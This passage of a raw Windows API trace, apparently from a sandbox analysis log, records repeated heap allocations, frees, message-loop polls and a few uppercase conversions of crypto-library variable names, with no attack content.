Size=0x1) returned 0x2e54b68 [0138.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0138.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0138.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0138.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0138.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0138.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0138.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0138.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0138.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0138.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0138.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0138.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0138.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0138.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0138.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0138.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0138.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0138.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xffed) returned 0x2e80330 [0138.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0138.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0138.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0138.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0138.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0138.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0138.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0138.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0138.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0138.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0138.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0138.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0138.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0138.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0138.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0138.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0138.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0138.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0138.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0138.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0138.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0138.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0138.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0138.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0138.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0138.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0138.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0138.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0138.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0138.820] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0138.820] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0138.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0138.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0138.820] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0138.820] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0138.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0138.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0138.820] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0138.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0138.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0138.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0138.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0138.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0138.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0138.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0138.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0138.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0138.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0138.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0138.821] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0138.821] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0138.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0138.821] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0138.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0138.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0138.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0138.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0138.821] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0138.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0138.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0138.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0138.821] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0138.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0138.821] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0138.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0138.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0138.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0138.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0138.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0138.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0138.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0138.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0138.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0138.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0138.822] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0138.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0138.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0138.822] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0138.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0138.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0138.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0138.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0138.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0138.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0138.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0138.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0138.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0138.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0138.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0138.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0138.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0138.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0138.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0138.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0138.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0138.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0138.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0138.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0138.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0138.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0138.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0138.825] 